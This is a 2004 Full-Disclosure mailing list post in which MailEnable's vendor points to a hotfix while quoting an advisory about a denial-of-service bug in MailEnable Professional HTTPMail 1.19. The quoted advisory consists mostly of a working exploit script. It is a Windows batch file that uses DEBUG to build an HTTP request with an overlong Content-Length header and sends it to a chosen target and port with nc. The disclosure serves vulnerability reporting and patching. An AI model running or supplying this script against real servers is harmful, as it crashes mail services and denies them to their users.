Thanks, A hotfix for this bug is available from: http://www.mailenable.com/hotfix Peter Fregon MailEnable Pty. Ltd. -----Original Message----- From: full-disclosure-admin@xxxxxxxxxxxxxxxx [mailto:full-disclosure-admin@xxxxxxxxxxxxxxxx] On Behalf Of CoolICE Sent: Monday, 2 August 2004 5:19 PM To: suggest Cc: bugtraq; full-disclosure; list Subject: [Full-Disclosure] DOS@MEHTTPS :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Application: MailEnable Professional HTTPMail :Vendors: http://www.mailenable.com/ :Version: 1.19 :Platforms: Windows :Bug: D.O.S :Date: 2004-07-30 :Author: CoolICE :E_mail: CoolICE#China.com :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: @echo off ;if '%1'=='' echo Usage:%0 target [port]&&goto :eof ;set PORT=8080 ;if not '%2'=='' set PORT=%2 ;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof ;DEBUG < %~s0 ;GOTO :run e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: " !DOS@length>0x64 f 120 183 39 e 184 "XXXX" 0d 0a 0d 0a rcx 8c nhttp.tmp w q :run nc %1 %PORT% < http.tmp del http.tmp _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
